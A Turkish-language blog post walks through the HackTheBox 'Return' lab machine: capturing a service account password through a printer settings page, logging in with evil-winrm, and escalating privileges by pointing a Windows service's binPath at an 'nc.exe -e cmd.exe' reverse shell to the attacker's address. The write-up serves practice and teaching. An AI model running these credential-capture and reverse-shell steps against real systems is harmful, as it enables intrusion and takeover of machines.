Siber Güvenlik Portalı

  1. Anasayfa
  2. »
  3. CTF ÇÖZÜMLERİ
  4. »
  5. Hackthebox Return Makine Çözümü

Hackthebox Return Makine Çözümü

Siber Güvenlik Portalı Siber Güvenlik Portalı - - 3 dk okuma süresi
424 0
HackTheBox Return Makine Çözümü

Merhabalar bu yazımda Hackthebox Return Makine Çözümü sizler için paylaşacağım. 

1-  İlk olarak nmap taraması ile başlıyorum. Baktığımda Windows makine olduğunu tespit ediyorum. Çok fazla port açık ve benim dikkatimi çeken 80.port ve 445. portlar. İncelemeye başlıyorum. 

Hackthebox Return Makine Çözümü

2- 80. porta gittiğimizde http olarak girdim ve karşımıza yazıcı ayarları çıktı. HTP Printer tarzı bir sayfa bizi karşıladı. 

Server adress’e kendi local ip adresimizi yazarak geri bağlantı alıp şifreyi görebiliriz. 

Şifreyi bulabilirsek makine içerisine giriş yapma olanağımız olabilir. 

Hackthebox Return Makine Çözümü

3- Önce ncat -lvnp 389 yazarak portu dinlemeye aldık. Kendi VPN ip adresimi yazdıktan sonra update yaptım ve bağlantı gelmiş olması lazım. 

Hackthebox Return Makine Çözümü

4- Evet direkt olarak karşımıza şifreyi çıkardı. Buradan anladığımız kullanıcı adı svc-printer şifre 1edFg43012!! olarak tespit ettik. Şimdi makine içerisine girmeye çalışalım. 

Hackthebox Return Makine Çözümü

5-  Evil-winrm ile direkt windows makine içerisine geçiş yapıyoruz. 

  • Kullanıcı adı: svc-printer
  • şifre: 1edFg43012!!

Sizde yoksa apt-get install evil-winrm yazarak kurabilirsiniz. Evil-winrm uzak windows makinelerinin içerisine direkt giriş yapma olanağı sağlıyor.  

evil-winrm -i 10.10.11.108 -u svc-printer -p ‘1edFg43012!!’ yazdık ve içerdeyiz. 

İlginizi çekebilecek yazımız: Yeni Bluetooth Açığı, Bilgisayar Korsanlarının Cihazları Ele Geçirmesine İzin Verdi

Hackthebox Return Makine Çözümü

6- Desktop içerisine gelerek ilk bayrağımızı bulduk. Windows makinelerde type ile direkt içerikleri okuyabilirsiniz. Burada cat, ls gibi komutları kullanamazsınız. 

7- Kullanıcıları inceledim. İçerisine net user svc-printer ile ayarlama yapıyorum. 

Amacım reverse shell almaya çalışmak, böylece direkt administrator içerisine geçiş yapabiliriz. 

8- upload /root/nc.exe yazarak root klasörü içerisindeki nc.exe’yi makineye yüklüyoruz. Tab tuşuna bastığınızda dizin yolunu kendi otomatik tamamlar. 🙂 

Nc.exe indirme linki: Github

9- Öncesinde ncat -lvnp 9001 port ile dinlemeyi başlatalım. Bağlantılar artık direkt ncat içerisine gelecektir. 

Sırasıyla;

  • sc.exe config vss binPath=”C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe vpn ip adresiniz 9001″ yazıp enter yapıyoruz. 
  • sc.exe stop vss
  • sc.exe start vss

Bu komutlar ile önce Path üzerinden servis üzerinde shell almaya çalışıyoruz. Aslında baktığımızda Linux sunuculara göre biraz daha kolaylığı var ve yetki yükseltme aşamaları daha keyifli. 🙂 

Daha sonra servisi durdurup sıfırdan başlattığımızda direkt olarak ncat üzerine bağlantı gidecektir. 

10- Direkt cd C:\Users\Administrator\Desktop içerisine hızlıca geçiş yapabilirsiniz. 

type root.txt direkt son bayrağı bulduk. 

Hackthebox Return Makine Çözümü sonuna geldik. Yeni yazılarda görüşmek üzere. Sağlıcakla kalın..

İlgili Yazılar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir